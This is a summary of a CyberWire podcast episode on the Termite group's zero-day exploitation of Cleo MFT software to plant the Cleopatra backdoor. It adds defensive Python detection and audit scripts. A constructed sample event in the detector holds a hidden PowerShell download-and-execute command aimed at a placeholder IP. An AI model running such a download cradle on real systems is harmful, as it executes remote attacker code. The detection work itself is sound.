CyberWire Daily – Episode: Cleo’s Trojan Horse [Research Saturday]
Release Date: February 8, 2025
Host: Dave Bittner
Guest: Mark Manglicmot, Senior Vice President of Security Services at Arctic Wolf
Research Discussed: Cleopatra's Shadow: A Mass Exploitation Campaign Deploying a Java Backdoor through Zero-Day Exploitation of Cleo MFT Software
Introduction
In this episode of CyberWire Daily's Research Saturday, host Dave Bittner talks with Mark Manglicmot of Arctic Wolf about a mass exploitation campaign built on a zero-day vulnerability in Cleo's Managed File Transfer (MFT) software. The campaign delivered a Java-based backdoor that Arctic Wolf named Cleopatra.
Overview of the Threat Campaign
Mark Manglicmot begins by outlining the discovery made by Arctic Wolf's Threat Intelligence team on December 10. They identified a novel mass exploitation campaign targeting Cleo's MFT products, business-to-business supply chain integration software that organizations use to exchange files with their trading partners.
Mark Manglicmot [02:24]: "The research we're discussing today is titled Cleopatra's Shadow: A Mass Exploitation Campaign Deploying a Java Backdoor through Zero-Day Exploitation of Cleo MFT Software."
Technical Analysis
The attackers exploited a zero-day vulnerability, CVE-2024-50623, in Cleo's MFT software, which affects both the Windows and Linux versions of Harmony, VLTrader, and LexiCom. The execution chain was notably complex, involving:
- Obfuscated PowerShell Scripts: an initial stage of obfuscated scripts executed through PowerShell on the compromised host.
- Java Loader: a loader stage that downloaded and executed a Java Archive (JAR) file.
- Cleopatra Backdoor: a stealthy Java-based backdoor that gave the attackers a foothold for further activity.
Mark Manglicmot [04:37]: "The payload creates and runs a JAR file through the Cleo software using Cleo Autorun, automatically triggering predefined processes or scripts."
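The chain described above (the Cleo software, itself a Java application, causing PowerShell to run an obfuscated stage) is a parent-child relationship that endpoint telemetry can surface. The script below is an added example, not code from the episode or from Arctic Wolf: it scans process-creation events for a Java process under a Cleo install root spawning a shell, and decodes any `-EncodedCommand` payload so an analyst sees the plaintext. The Sysmon-style field names (`ParentImage`, `Image`, `CommandLine`), the default install roots (`C:\Harmony`, `C:\VLTrader`, `C:\LexiCom`) and the sample events are assumptions constructed for the demo.

```python
"""Flag Cleo-hosted Java processes spawning PowerShell/cmd and decode -EncodedCommand.
Added example; the event records below are constructed, not real telemetry."""
import base64
import ntpath
from typing import Iterable, List, Optional

# Assumption: Cleo Harmony/VLTrader/LexiCom run as a JVM under their install root.
# Default roots are assumed here; adjust to your deployment.
CLEO_ROOTS = ("harmony", "vltrader", "lexicom")
JAVA_IMAGES = {"java.exe", "javaw.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def is_cleo_java(parent_image: str) -> bool:
    """True when the parent is a JVM whose path passes through a Cleo install root."""
    p = parent_image.lower().replace("/", "\\")
    if ntpath.basename(p) not in JAVA_IMAGES:
        return False
    return any("\\" + root + "\\" in p for root in CLEO_ROOTS)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload if present.
    PowerShell accepts any unambiguous prefix of the switch (-e, -ec, -enc, ...),
    and the payload is base64 over UTF-16LE text."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        key = tok.lstrip("-/").lower()
        if key and "encodedcommand".startswith(key):
            try:
                return base64.b64decode(toks[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None  # not valid base64/UTF-16LE: leave for manual review
    return None


def encode_powershell(script: str) -> str:
    """Build the base64 form PowerShell expects; used only to construct the sample event."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def detect(events: Iterable[dict]) -> List[dict]:
    """Return one hit per shell spawned by a Cleo JVM, with the decoded command if any."""
    hits = []
    for ev in events:
        child = ntpath.basename(ev["Image"].lower().replace("/", "\\"))
        if child in SHELLS and is_cleo_java(ev["ParentImage"]):
            hits.append({
                "parent": ev["ParentImage"],
                "child": ev["Image"],
                "decoded": decode_encoded_command(ev["CommandLine"]),
            })
    return hits


# Constructed sample events (not real telemetry). The download URL is a documentation address.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Harmony\jre\bin\java.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -enc " + encode_powershell(SAMPLE_SCRIPT)},
    {"ParentImage": r"C:\Windows\explorer.exe",  # benign: interactive user running a script
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File backup.ps1"},
    {"ParentImage": r"C:\LexiCom\jre\bin\java.exe",  # suspicious even without encoding
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit["parent"], "->", hit["child"])
        print("  decoded:", hit["decoded"])
```

On a real deployment, feed `detect()` the process-creation events from your EDR or Sysmon pipeline and treat any hit as a containment trigger; the Linux builds of the same products would need the equivalent check for a Java parent spawning `sh` or `bash`.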
Attacker Profile
The campaign is attributed to a newer threat group known as Termite, which was also linked to the earlier attack on the supply chain software vendor Blue Yonder. Unlike some sophisticated groups that continuously evolve their tactics, Termite prefers to use established methods effectively.
Mark Manglicmot [05:57]: "They're using older types of ransomware. If they can have an effective attack through simple means, they'll do that without trying too hard."
Mitigation and Response
Arctic Wolf's response in affected environments covered three steps:
- Containment: identifying and isolating affected hosts to prevent the spread of ransomware.
- Cleanup: removing suspicious files from the Cleo software directories and disabling the Autorun feature.
- Configuration Hardening: restricting the file-system commands available through the Cleo software.
Mark Manglicmot [11:27]: "If you see anything that's happening on a host that looks like ransomware, we'll reach out and contain those devices so that nothing else spreads."
Broader Implications and Lessons Learned
This incident underscores a growing trend of targeting MFT software, which sits at the boundary between an organization and the many partners it exchanges files with, so one compromised server can expose numerous connected companies within a supply chain. Key takeaways include:
- Vulnerability Management: The critical importance of applying patches promptly to mitigate exploit risks.
- Access Controls: Strengthening user and administrative privileges to limit potential attack vectors.
- Cross-Platform Security: Ensuring robust monitoring and security controls across both Windows and Linux systems.
Mark Manglicmot [12:56]: "Vulnerability management still is one of the most important things for companies to focus on."
Recommendations
Organizations using Cleo MFT software should take the following immediate actions to safeguard their systems:
- Apply the Latest Patch: upgrade Harmony, VLTrader, and LexiCom to Cleo version 5.8.0.24 to address the identified vulnerabilities.
- Harden Autorun Settings: disable or restrict the Autorun feature within the Cleo software to prevent automatic execution of malicious scripts.
- Review Access Controls: Implement strict access privileges and monitor administrative privileges closely.
- Enhance Security Monitoring: Deploy comprehensive security monitoring solutions to detect and respond to suspicious activities promptly.
Mark Manglicmot [15:26]: "Number one, apply the latest patch. That's the most important thing you can do."
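The first two recommendations above (confirm the build is at or past 5.8.0.24, and make sure nothing is left for Autorun to execute) are quick to check on each server. The following is an added example of such an audit, not tooling from Arctic Wolf or Cleo. It assumes the product keeps Autorun scripts in an `autorun` subdirectory of the install root and trading-partner definitions in `hosts`; both names and the throwaway fixture in `demo()` are assumptions for the demo, so adjust them to your deployment. The version check deliberately compares numerically, because a plain string compare would rank `5.8.0.9` above `5.8.0.24`.

```python
"""Audit a Cleo MFT install root: compare the running build with the fixed build and
list what is sitting in the autorun and hosts directories.
Added example, not Arctic Wolf's or Cleo's own tooling; directory names are assumptions."""
import os
import tempfile
import time
from typing import List, Tuple

FIXED_VERSION = "5.8.0.24"   # patched build named in the episode
# Assumption: Cleo Harmony/VLTrader/LexiCom keep Autorun scripts in <root>/autorun and
# host definitions in <root>/hosts. Adjust to your deployment.
AUTORUN_DIR = "autorun"
HOSTS_DIR = "hosts"
WATCH_EXT = {".jar", ".xml", ".ps1", ".bat", ".sh", ".txt"}


def version_tuple(v: str) -> Tuple[int, ...]:
    return tuple(int(part) for part in v.strip().split("."))


def is_patched(version: str, fixed: str = FIXED_VERSION) -> bool:
    """Numeric compare: a string compare would rank 5.8.0.9 above 5.8.0.24."""
    return version_tuple(version) >= version_tuple(fixed)


def audit_install(root: str, max_age_hours: float = 72.0, now: float = None) -> List[dict]:
    """Return findings: every file under autorun (it should be empty once Autorun is
    disabled) and any recently modified script or config file under hosts."""
    now = time.time() if now is None else now
    cutoff = now - max_age_hours * 3600
    findings = []
    autorun = os.path.join(root, AUTORUN_DIR)
    if os.path.isdir(autorun):
        for dirpath, _, files in os.walk(autorun):
            for name in files:
                findings.append({"path": os.path.join(dirpath, name),
                                 "reason": "file present in autorun directory"})
    hosts = os.path.join(root, HOSTS_DIR)
    if os.path.isdir(hosts):
        for dirpath, _, files in os.walk(hosts):
            for name in files:
                path = os.path.join(dirpath, name)
                ext = os.path.splitext(name)[1].lower()
                if ext in WATCH_EXT and os.stat(path).st_mtime >= cutoff:
                    findings.append({"path": path,
                                     "reason": f"{ext} file modified within {max_age_hours:g}h"})
    return findings


def demo() -> List[dict]:
    """Constructed fixture: a throwaway install root with one planted JAR in autorun,
    one freshly written host file and one stale host file (mtime 10 days old)."""
    root = tempfile.mkdtemp(prefix="cleo-audit-")
    os.makedirs(os.path.join(root, AUTORUN_DIR))
    os.makedirs(os.path.join(root, HOSTS_DIR))
    planted = os.path.join(root, AUTORUN_DIR, "update.jar")
    fresh = os.path.join(root, HOSTS_DIR, "partner.xml")
    stale = os.path.join(root, HOSTS_DIR, "legacy.xml")
    for path in (planted, fresh, stale):
        with open(path, "w") as fh:
            fh.write("placeholder\n")
    ten_days_ago = time.time() - 10 * 86400
    os.utime(stale, (ten_days_ago, ten_days_ago))
    return audit_install(root)


if __name__ == "__main__":
    for v in ("5.8.0.21", "5.8.0.24", "5.8.0.9"):
        print(v, "patched" if is_patched(v) else "NOT patched")
    for finding in demo():
        print(finding["reason"], "->", finding["path"])
```

Point `audit_install()` at the real install root (for example `C:\Harmony` or the Linux equivalent) and read the version string from the product itself; anything reported under `autorun` after Autorun has been disabled, or a host file that changed when no administrator touched it, deserves the same containment treatment the episode describes.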
Unique Aspects of the Cleopatra Campaign
What sets the Cleopatra campaign apart is its methodical approach to stealth and persistence. Unlike previous "smash and grab" tactics, Termite employs obfuscation and stealth to maintain prolonged access within targeted networks, allowing for extensive reconnaissance and selective ransomware deployment.
Mark Manglicmot [16:24]: "They were trying to be a little bit stealthy with how they did things, which is a bit of an evolution on some of these managed file transfer attacks."
Conclusion
The Cleopatra campaign highlights the evolving nature of cyber threats targeting supply chain integration tools. It emphasizes the necessity for organizations to maintain rigorous vulnerability management practices, implement robust access controls, and continuously monitor their systems for unusual activities. By adhering to these best practices, companies can significantly reduce their risk of falling victim to such sophisticated exploitation campaigns.
Mark Manglicmot [17:51]: "You have to rely on those companies to make sure that they're developing patches and you apply them."
CyberWire Daily ensures that listeners stay informed about the latest cybersecurity threats and mitigation strategies. For more detailed insights and resources related to this episode, please refer to the Show Notes.
Notable Quotes:
- Mark Manglicmot [04:37]: "The payload creates and runs a JAR file through the Cleo software using Cleo Autorun, automatically triggering predefined processes or scripts."
- Mark Manglicmot [05:57]: "They're using older types of ransomware. If they can have an effective attack through simple means, they'll do that without trying too hard."
- Mark Manglicmot [12:56]: "Vulnerability management still is one of the most important things for companies to focus on."
- Mark Manglicmot [16:24]: "They were trying to be a little bit stealthy with how they did things, which is a bit of an evolution on some of these managed file transfer attacks."
- Mark Manglicmot [17:51]: "You have to rely on those companies to make sure that they're developing patches and you apply them."
Additional Resources:
For a comprehensive understanding of the Cleopatra campaign and Arctic Wolf's research, visit the CyberWire Show Notes or access the full research report titled Cleopatra's Shadow.